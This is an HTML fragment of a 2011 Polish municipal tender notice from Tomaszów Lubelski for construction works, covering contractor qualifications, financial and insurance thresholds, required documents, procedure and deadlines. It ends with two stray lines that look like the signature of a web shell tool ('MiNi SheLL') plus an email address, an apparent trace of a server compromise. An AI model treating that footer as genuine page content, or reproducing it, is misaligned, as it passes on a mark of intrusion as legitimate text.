<ul class="kh_indent_1"><li><p>Zamawiający uzna przedmiotowy warunek za spełniony w odniesieniu do wykonawców, którzy;
dysponują co najmniej 3 osobami zdolnymi do wykonania zamówienia. Osoby te:
-powinny posiadać określone przepisami Prawa budowlanego kwalifikacje zawodowe    konieczne do realizacji zamówienia w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo   budowlane (tekst jedn. z 2010r., Dz. U. z 2010 r. nr 243 poz. 1623),  
-powinny posiadać  min. 5 letnie doświadczenie zawodowe w kierowaniu pracami budowlanymi w zakresie posiadanych uprawnień budowlanych (funkcja kierownika budowy z posiadanymi uprawnieniami), a w szczególności:
a)dysponują osobą posiadającą uprawnienia budowlane bez ograniczeń do kierowania     robotami budowlanymi w specjalności konstrukcyjno - budowlanej, 
b)dysponują osobą posiadającą uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w zakresie sieci, instalacji i urządzeń wodociągowych, kanalizacyjnych, cieplnych, wentylacyjnych i gazowych,
c)dysponują osobą posiadającą uprawnienia budowlane bez ograniczeń do kierowania robotami  budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych. 
Zamawiający przez spełnienie warunku dotyczącego stażu pracy rozumie pełnienie ww. funkcji po uzyskaniu uprawnień budowlanych zgodnie z obowiązującym w tym zakresie przepisami prawa.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Zamawiający uzna przedmiotowy warunek za spełniony przez wykonawców, którzy wykażą posiadanie  środków  finansowych  lub zdolność  kredytową w wysokości nie mniejszej niż  200 000,00 zł., oraz fakt ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę min. 500 000,00 zł,
2. W zakresie warunków udziału w postępowaniu dotyczących dysponowania  środkami finansowymi, lub zdolnością kredytową, posiadania ubezpieczenia od odpowiedzialności cywilnej, a także wykazania się doświadczeniem w zakresie wykonania robót budowlanych w odpowiedniej wysokości, oraz  wadium - w celu zapewnienia równego traktowania wykonawców przy dokonywaniu oceny spełniania tych warunków, wartości podane przez Wykonawcę w walutach innych niż złoty polski Zamawiający będzie przeliczał na wartości 
w złotówkach według kursu średniego danej waluty ogłoszonego przez Narodowy Bank Polski w dniu publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych. 
3. W zakresie warunków udziału w postępowaniu dotyczącym dysponowania  środkami finansowymi, lub zdolnością kredytową,  posiadania ubezpieczenia od odpowiedzialności cywilnej, a także wykazania się doświadczeniem w zakresie wykonania robót budowlanych w odpowiedniej wysokości, oraz w przypadku wadium złożonym w walutach obcych -  w celu zapewnienia równego traktowania wykonawców przy dokonywaniu oceny spełnienia tych warunków, wartości podane przez Wykonawcę w walutach innych niż złoty polski Zamawiający będzie przeliczał na wartości w złotówkach według kursu średniego danej waluty ogłoszonego  przez Narodowy Bank Polski w dniu publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne są nastepujące przypadki i warunki zmiany umowy 1. Zmniejszenia zakresu przedmiotu zamówienia, gdy jego wykonanie w pierwotnym zakresie nie leży w interesie Zamawiającego w granicach uzasadnionego interesu Zamawiającego; 2.Zmiany materiałów budowlanych i sprzętu, gdy wykorzystanie
materiałów budowlanych i sprzętu, wskazanych w dokumentacji projektowej lub ofercie stanie się niemożliwe bądź podyktowane będzie usprawnieniem procesu budowy, postępem technologicznym, zwiększeniem bezpieczeństwa na budowie pod warunkiem, że zmiana nastąpi na materiały, i sprzęt posiadające, co najmniej
takie same parametry jakościowe i cechy użytkowe, jak te, które stanowiły podstawę wyboru oferty i pod warunkiem nie zwiększania ceny; 3. Wystąpienia konieczności wykonania zamówień dodatkowych, których realizacja będzie miała wpływ na termin wykonania przedmiotu umowy; 4. Zmiany terminu realizacji przedmiotu zamówienia, w przypadku : a) gdy wykonanie zamówienia w określonym pierwotnie terminie nie leży w interesie Zamawiającego. b)z powodu działania siły wyższej, uniemożliwiającej wykonanie robót w określonym pierwotnie
terminie, o czas działania siły wyższej oraz potrzebny do usunięcia skutków tego działania, c)konieczności zmniejszenia zakresu przedmiotu zamówienia, gdy jego wykonanie w pierwotnym zakresie nie leży w interesie Zamawiającego o czas proporcjonalny do zmniejszonego zakresu, d)konieczności uzyskania decyzji lub
uzgodnień, mogących spowodować wstrzymanie robót - o czas niezbędny do uzyskania wymaganych decyzji bądź uzgodnień lub do wykonania dodatkowych ekspertyz, badań, Zmiana postanowień zawartej umowy może nastapić wyłącznie za zgodą obu stron wyrażoną w formie pisemnego aneksu pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.tomaszow-lubelski.pl/infpub/przetargi.htm<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta w Tomaszowie Lubelskim, ul. Lwowskiej 57, pok. 29..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.11.2011 godzina 10:00, miejsce: Urząd Miasta w Tomaszowie Lubelskim, ul. Lwowska 57, pokój Nr 23.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.Nie zamierza się ustanowienia dynamicznego systemu zakupów. 2. Nie przewiduje się wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com